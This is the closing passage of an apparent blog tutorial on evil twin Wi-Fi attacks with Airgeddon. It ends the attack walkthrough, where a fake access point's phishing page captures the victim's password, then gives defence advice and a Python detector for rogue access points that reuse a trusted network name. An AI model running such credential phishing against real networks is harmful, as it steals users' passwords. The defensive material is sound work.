       Press [Enter] on the main script window to continue, this window will be closed

After this, you can close the window, and close down the tool by pressing Ctrl + C. If we get a valid credential in this step, then our attack has worked, and we’ve got the Wi-Fi password by tricking the user into submitting it to our fake AP’s phishing page!

Defending Against an Evil Twin AP Attack

The best way of defending against an evil twin attack is to know about the tactic and to treat its signs as highly suspicious. If you abruptly lose the ability to connect to your trusted network and at the same time see an open wireless network with the same name, that is neither a coincidence nor a normal turn of events.

Never connect to an unknown wireless network pretending to be yours, especially one without encryption. If you suspect your router really is updating, turn off your Wi-Fi and plug into the router directly over Ethernet to see what the problem is.
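As an added example that is not part of the original post or of Airgeddon, here is a small detector for exactly the signs described above: a trusted network name appearing from an unknown BSSID, or appearing as an open network when the real one is encrypted. It assumes scan records in the shape of terse nmcli output (`nmcli -t -f BSSID,SSID,CHAN,SECURITY dev wifi`); the sample scan lines and the trusted-network table are constructed.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class AccessPoint:
    bssid: str
    essid: str
    channel: int
    security: str  # e.g. "WPA2"; "" (or "--") means an open network

# Constructed: the networks this device is expected to join, keyed by ESSID.
TRUSTED = {
    "HomeNet": {"bssids": {"AA:BB:CC:DD:EE:01"}, "security": "WPA2"},
}

# Constructed sample in the shape of `nmcli -t -f BSSID,SSID,CHAN,SECURITY dev wifi`
# (terse mode escapes the colons inside a BSSID as "\:").  The second line is an
# open AP reusing the trusted ESSID from a different BSSID: the evil-twin pattern.
SAMPLE_SCAN = """\
AA\\:BB\\:CC\\:DD\\:EE\\:01:HomeNet:11:WPA2
DE\\:AD\\:BE\\:EF\\:00\\:01:HomeNet:11:
AA\\:BB\\:CC\\:DD\\:EE\\:02:Neighbor:6:WPA2
"""

def parse_nmcli(text):
    """Parse terse nmcli lines into AccessPoint records."""
    aps = []
    for line in text.strip().splitlines():
        # Split only on colons that are not escaped, then undo the escaping.
        fields = [f.replace("\\:", ":") for f in re.split(r"(?<!\\):", line)]
        bssid, ssid, chan, sec = fields
        aps.append(AccessPoint(bssid.upper(), ssid, int(chan), sec))
    return aps

def evil_twin_alerts(aps, trusted=TRUSTED):
    """Return one alert string per suspicious AP that reuses a trusted ESSID."""
    alerts = []
    for ap in aps:
        known = trusted.get(ap.essid)
        if known is None:
            continue  # not one of our networks; nothing to compare against
        if ap.bssid not in known["bssids"]:
            alerts.append(f"{ap.essid}: unknown BSSID {ap.bssid} on channel {ap.channel}")
        if ap.security in ("", "--") and known["security"]:
            alerts.append(f"{ap.essid}: advertised OPEN by {ap.bssid}, expected {known['security']}")
    return alerts
```

Running `evil_twin_alerts(parse_nmcli(SAMPLE_SCAN))` on the constructed scan yields two alerts for the open “HomeNet” AP with the unknown BSSID and none for the genuine one or the neighbour’s network.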

Thanks for reading this guide to evil twin AP attacks! If you have any questions or comments, feel free to leave a comment or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)